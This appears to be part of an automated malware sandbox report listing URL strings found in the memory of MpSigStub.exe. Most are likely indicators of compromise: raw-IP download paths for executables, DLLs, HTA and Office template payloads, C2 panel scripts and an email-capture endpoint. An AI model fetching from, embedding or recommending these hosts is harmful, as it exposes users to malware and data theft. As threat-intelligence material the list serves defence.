    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://%s/search/search.cgi?src=autosearch&s=%s
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://%s/support.php
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: http://%s/sync.php
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://%s:%d/%s%d%08dindex.asp?ToDowbSVCHOST.EXErbSeDe
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://%s:%d/%s%d%sindex.asp?%u%dOEMCP
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: http://%s:%d/%sPOSTid=41.php?
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://%s:%s/bks.asp
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpString found in binary or memory: http://%sMozilla/4.0
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://(.-/)
    Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmpString found in binary or memory: http://.(www.blackcheta.blogspot.com/)
    Source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmpString found in binary or memory: http://.exeuser32.dll
    Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmpString found in binary or memory: http://.ocx.cabhtml:file:ftp://
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://.online/a
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://.zdropp.co.cc/download.php?token=
    Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmpString found in binary or memory: http://0-2-t-9-r-6-p-4-4-4-s-0-h-e-.i-k-r-g-1-0-u-5-1-f-3-g-li-9-p-1-x-t-6-g-l-8-m-q-y-s-k-6-l.info
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://0.82211.net/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://00.1.00.2.1.11.9.online.secured.adobe.protected.file.version.9.8.online.verification.access.v
    Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmpString found in binary or memory: http://0147.0131.0133.0174/..----------------------....................-.....................-/.....
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://03ptc6fk0.ru/clogs/index.php?
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://0d91.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://0vyk.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://1-0-9.cn/zxc/index.htm
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://1.wangyouxf.cn/index.htmwidth=0height=0
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://10.103.2.247
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://10.24.13.102/office.png
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://103.133.106.72/ini/................wbk
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://103.140.251.93/_....-------------------------.....------------_----/
    Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmpString found in binary or memory: http://103.149.12.183/bigi.doc
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://103.149.12.183/p1.doc
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://103.149.12.183/u1.doc
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://103.213.245.135/n.hta
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://103.49.146.132/OpenCL.dll
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://103.49.146.132/cpu_tromp_AVX.dll
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://103.49.146.132/cpu_tromp_SSE2.dll
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://103.49.146.132/cudart32_80.dll
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://103.49.146.132/svchost.exe
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://104.153.45.242/~cimbonli//wp-content/upload/ken.exe
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://104.236.94.
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: http://104.243.35.43
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://107.170.47.94/mdsatalho/
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpString found in binary or memory: http://107.172.130.145/
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://107.173.191.48/deck/m.dot
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://107.173.219.115:4560/press1.exe
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://107.173.219.80/
    Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://107.189.10.150/ht/
    Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmpString found in binary or memory: http://108.61.208.60
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://109.248.148.42/officedocument/2006/relationships/templates.dotm
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://110.34.232.11:1314
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://110.42.4.180:
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://112.164.188.12/hza.html
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://114.108.151.148/lib/lib.asp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://116.37.147.205/hit.php
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://118.184.48.95:8000/info
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://119.249.54.113/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://119.92.89.144/tmp/
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://120.125.201.101/logo/
    Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmpString found in binary or memory: http://120061996-783405463700123057.preview.editmysite.com/uploads/1/2/0
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://121.14.
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://122.228.228.7
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmpString found in binary or memory: http://123support.online/
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://123zphimonline.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1/down/list2.txt
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1/tracking?source=
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:20202/remind.html
    Source: MpSigStub.exe, 00000023.00000003.6286232837.0000028BD6261000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:27777/?inj=http://
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:5
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:5/
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:5555/
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:8081/dial.html?
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:8089/index.html?
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:8332
    Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:8545
    Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:9600/IperiusHSa
    Source: RegAsm.exe, 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://13.233.183.227/de/lngukm2012920/bestellungen/zahlung
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://131.153.38.125/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://139.162.
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://144.217.14.173/doc.doc
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://149.20.4.69
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpString found in binary or memory: http://149.202.110.58/document_012001.doc
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://149.3.170.235/qw-fad/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://152.89.218.86/
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://155.138.254.3/ok.js
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://158.255.1.137/1/live.php
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://158.255.5.220
    Source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmpString found in binary or memory: http://159.8.31.231/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: http://162.241.124.111/q/1.gif
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://164.132.171.89/promo.php
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://165.227.7.138/index.hta
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://169.54.172.92/coreslibri.zip
    Source: MpSigStub.exe, 00000023.00000003.6307889726.0000028BD7137000.00000004.00000001.sdmpString found in binary or memory: http://170.130.55.135/api.php
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://172.16.1.1/exm.rtf
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://172.98.73.57
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://173.201.215.95/depmex/xhi05bs8.php?id=2809310
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://173.208.139.170/s.txt
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://178.128.11.199/qtx.
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://178.128.115.182/wp-includes/3_y/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://178.62.19.66/campo/v/v
    Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmpString found in binary or memory: http://178.79.137.25/campo/
    Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmpString found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://18.130.111.206/wp/x_y/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://181.174.166.137/sys/f4.exe
    Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmpString found in binary or memory: http://184.105.163.238/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://185.14.30.131/api.php
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://185.141.25.168/check_attack/
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpString found in binary or memory: http://185.153.198.216:8010/UserService
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://185.165.29.36/11.mov
    Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmpString found in binary or memory: http://185.165.30.31
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://185.172.110.217/kvsn/image.png
    Source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmpString found in binary or memory: http://185.172.110.217/robx/remit.jpg
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpString found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://185.183.98.14/fontsupdate.php
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://185.225.19.240/dmenconsvc.dll
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://185.236.231.210/test/en/dsf.php
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://185.243.215.213/sys_info.vbs
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://185.250.149.128/
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://185.26.113.95:8095/batpower2.txt
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://185.38.142.91/awo/
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://185.38.142.91/awo/next.php
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://185.82.218.2/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://185.82.218.30/44313
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://188.127.254.159/
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://188.166.41.131/momo.php
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.190/
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmpString found in binary or memory: http://190.14.37.191/
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://192.168.0.108/download.ps1
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://192.168.1.60/6464.exe
    Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmpString found in binary or memory: http://192.168.100.5/00ButtonTest.exe
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://192.168.213.131/logo.doc
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://192.168.88.
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpString found in binary or memory: http://69.31.80.
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://69.31.84.223/
    Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmpString found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://69.64.36.110/msn.php?email=
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://6flp.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://6tof.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmpString found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://70.38.40.185
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://72.29.80.113/~nossacai/
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://75.127.1.211/hkcmd/document.doc
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://76h1.blogspot.com/
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpString found in binary or memory: http://77.81.225.138/carnaval2017.zip
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://78.128.92.108/document/word.doc
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://78.128.92.26/
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: http://78.157.143.251
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://78.24.220.183/
    Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmpString found in binary or memory: http://78.46.16.53/~quickend/lll.php
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://78.soupay.com/plugin/g.asp?id=
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://79.110.52.186/fide/f.wbk
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://79.110.52.186/naki/n.wbk
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://79.125.7.221/
    Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmpString found in binary or memory: http://8.8.8.8/
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: http://81.16.141.208/q37kkp
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpString found in binary or memory: http://81.176.237.140/serv/
    Source: MpSigStub.exe, 00000023.00000003.6435679539.0000028BD7C4B000.00000004.00000001.sdmpString found in binary or memory: http://81.177.26.20/ayayay
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: http://81.29.241.70/new/counter.phpframeborder=
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: http://82.118.23.186/
    Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmpString found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmpString found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpString found in binary or memory: http://82.98.235.
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://83.136.232.110/44285
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://83.149.75.54/cgi-bin
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://83.166.242.164/desktop-st7lsde/
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://83.166.242.164/desktop-st7lsde/bid/relay.dot
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://85.17.138.60
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://85.17.3.151/cgi-bin
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://85.17.93.189/iddq/m
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://85.234.191.170/inst.php?id=
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://85.234.191.a7
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://85.255.11
    Source: MpSigStub.exe, 00000023.00000003.6286543485.0000028BD62AA000.00000004.00000001.sdmpString found in binary or memory: http://85.255.119
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpString found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: http://88.208.17.127/
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://888888.2288.org/Monitor_INI
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://88888888.7766.org/ExeIni
    Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmpString found in binary or memory: http://89.188.16.
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpString found in binary or memory: http://89.188.16.18/
